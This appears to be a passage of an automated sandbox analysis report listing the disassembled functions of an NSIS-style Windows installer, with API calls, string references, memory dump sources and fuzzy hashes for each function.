                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                    • String ID:
                                    • API String ID: 2320649405-0
                                    • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                    • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                    • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                    • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                    Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                    Strings
                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                    • API String ID: 1033533793-945480824
                                    • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                    • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                    • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                    • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                    Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                    • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                    • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                    • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                    • String ID:
                                    • API String ID: 2740478559-0
                                    • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                    • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                    • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                    • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                    Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                      • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                      • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                    Strings
                                    • Exec: command="%s", xrefs: 00402241
                                    • Exec: success ("%s"), xrefs: 00402263
                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                    • API String ID: 2014279497-3433828417
                                    • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                    • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                    • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                    • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                    Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                    • GetMessagePos.USER32 ref: 00404871
                                    • ScreenToClient.USER32(?,?), ref: 00404889
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Message$Send$ClientScreen
                                    • String ID: f
                                    • API String ID: 41195575-1993550816
                                    • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                    • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                    • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                    • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                    Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                    • MulDiv.KERNEL32(0000EC00,00000064,?), ref: 00403295
                                    • wsprintfW.USER32 ref: 004032A5
                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                    Strings
                                    • verifying installer: %d%%, xrefs: 0040329F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Text$ItemTimerWindowwsprintf
                                    • String ID: verifying installer: %d%%
                                    • API String ID: 1451636040-82062127
                                    • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                    • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                    • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                    • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                    Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                    • wsprintfW.USER32 ref: 00404457
                                    • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: ItemTextlstrlenwsprintf
                                    • String ID: %u.%u%s%s$@rD
                                    • API String ID: 3540041739-1813061909
                                    • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                    • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                    • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                    • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                    Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                    • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                    • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Char$Next$Prev
                                    • String ID: *?|<>/":
                                    • API String ID: 589700163-165019052
                                    • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                    • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                    • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                    • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                    Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: Close$DeleteEnumOpen
                                    • String ID:
                                    • API String ID: 1912718029-0
                                    • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                    • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                    • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                    • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                    Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?), ref: 004020A3
                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                    • String ID:
                                    • API String ID: 1849352358-0
                                    • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                    • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                    • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                    • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                    Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: MessageSend$Timeout
                                    • String ID: !
                                    • API String ID: 1777923405-2657877971
                                    • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                    • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                    • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                    • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                    Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                    Strings
                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                    • API String ID: 1697273262-1764544995
                                    • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                    • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                    • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                    • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                    Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindowVisible.USER32(?), ref: 00404902
                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
